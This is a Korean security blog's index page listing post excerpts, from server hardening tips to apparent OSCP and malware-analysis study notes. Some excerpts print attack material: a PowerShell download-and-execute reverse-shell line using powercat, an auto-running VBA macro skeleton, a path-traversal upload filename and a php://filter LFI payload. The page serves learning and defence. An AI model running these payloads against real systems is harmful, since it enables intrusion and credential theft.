728x90 분류 전체보기743 아파치 - 클라우드 플레어 아이피만 접근 허용(.htaccess) nano /var/www/html/.htaccess deny from allallow from 173.245.48.0/20allow from 103.21.244.0/22allow from 103.22.200.0/22allow from 103.31.4.0/22allow from 141.101.64.0/18allow from 108.162.192.0/18allow from 190.93.240.0/20allow from 188.114.96.0/20allow from 197.234.240.0/22allow from 198.41.128.0/17allow from 162.158.0.0/15allow from 104.16.0.0/13allow from 104.24.0.0/14allow from 172.64.0.0/1.. 2025. 8. 27. 리눅스 - ssh 로그인 횟수 초과 IP 차단(fail2ban) fail2ban 패키지 설치sudo apt updatesudo apt install fail2ban -y 설정 파일 수정(※jail.conf는 백업용, 실제 설정은 jail.local)sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local fail2ban 설정 sudo nano /etc/fail2ban/jail.local [sshd]enabled = trueport = sshfilter = sshdlogpath = /var/log/auth.logmaxretry = 3bantime = 48hfindtime = 10m maxretry: 허용할 최대 로그인 실패 횟수bantime: 차단 시간(100 = 100초, 10m = 10분, 1h = 1시간)findtime.. 2025. 8. 20. 클라우드 플레어 설정 후 522 에러 발생 원인 웹 서버에 SSL 인증을 지원하지 않는 경우(HTTP/80만 운용 중인 경우) 웹 서버와 클라우드 플레어 서로간 오류가 생기게 됨 해결) SSL/TLS 암호화 > 현재 암호화 모드가 "가변"이어야 함 2025. 8. 18. Flipper Zero - 키젠(keygen.co) https://keygen.co/ keygenkeygen generates working, high-quality 3D-printable models of keys based on given parameters. Select a key type to get started. Please wait... keygen generates working, high-quality 3D-printable models of keys based on given parameters. To generate a key,keygen.co 2025. 8. 17. java.security.cert.certpathvalidatorexception trust anchor for certification 에러 ISRG Root X1 혹은 ISRG Root X2 .pem 파일 설치https://letsencrypt.org/certificates/ Chains of TrustThis page describes all of the current and relevant historical Certification Authorities operated by Let’s Encrypt. Note that a CA is most correctly thought of as a key and a name: any given CA may be represented by multiple certificates which all contailetsencrypt.org출처: https://github.com/TeamNewPipe/Ne.. 2025. 8. 13. 모든 인코딩 디코딩 문자 확인 사이트(dencode.com) https://dencode.com/ DenCode | Encoding & Decoding Online ToolsEncoding and Decoding site. e.g. HTML Escape / URL Encoding / Base64 / MD5 / SHA-1 / CRC32 / and many other String, Number, DateTime, Color, Hash formats!dencode.com 2025. 8. 5. 블랙베리 - bar 설치 관련 링크 BAR 파일 설치 프로그램https://github.com/xsacha/Sachesi GitHub - xsacha/Sachesi: Firmware, extractor, searcher and installer for Blackberry 10Firmware, extractor, searcher and installer for Blackberry 10 - xsacha/Sachesigithub.com 터미널 앱(term-48) 아카이브 주소https://archive.org/details/term-48_bb10 2025. 7. 30. 취약점 분석 - CVE-2023-23397 CVE-2023-23397 취약점 정보CVE-2023-23397는 Microsoft Windows 전용 Outlook에 약속을 알려주는 ‘미리 알림’ 기능에 재생할 사운드 파일을 불러오기 위해서 공격자의 SMB 서버로 인증하는 과정에 NTLM 자격 증명을 탈취되는 권한 상승 취약점입니다.해당 취약점을 이용하여 권한 상승이 이루어져 더 큰 피해가 발생할 수 있을 정도로 위험도는 다소 높을 것으로 예상됩니다.조치 방안으로 Outlook을 Build 16130.20306 이상으로 업데이트가 필요하며, SMB 서비스를 이용하지 않을 경우에는 해당 서비스를 비활성화 하거나 SMB TCP/445 포트 아웃바운드를 차단합니다.CVE Number CVE-2023-23397CVSS Score9.8severity(심각도).. 2025. 7. 27. 취약점 분석 - NTLM 크리덴셜 패킷 스니퍼 (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com 사용 예시... 2025. 7. 27. 악성코드 분석 - 매크로 문서 악성 파일 IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')청크화(문자열이 너무 길면 오류가 발생) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26. OSCP - 9.3.2. Using Non-Executable Files 파일 업로드 시 실행이 불가능한 경우(e.g. 실행 권한이 없는 업로드 폴더)에 사용할 수 있는 취약점 분석 방법을 알아본다. 우선 파일 업로드 시 filename에 매개변수를 조작하여 ../../../../../../../test.txt를 넣어 서버로 전달한 경우 서버 측이 정상 응답을 한 경우 취약 가능성이 있을 수 있다. 특히 여기에 루트(/) 경로임에도 정상 업로드 된 것이라면 root의 홈디렉터리도 직접 접근이 가능함을 알 수 있다. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22. OSCP - 9.2.2. PHP Wrappers admin.php 파일 내용kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. 다음과 같이 LFI가 발생하는 경우(입력 검증 없이 바로 include 실행 => include $_GET["page"];)PHP Wrappers에 취약할 수 있다. admin.php 페이지 base64 인코딩(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21. 이전 1 2 3 4 ··· 62 다음 728x90
HackLog
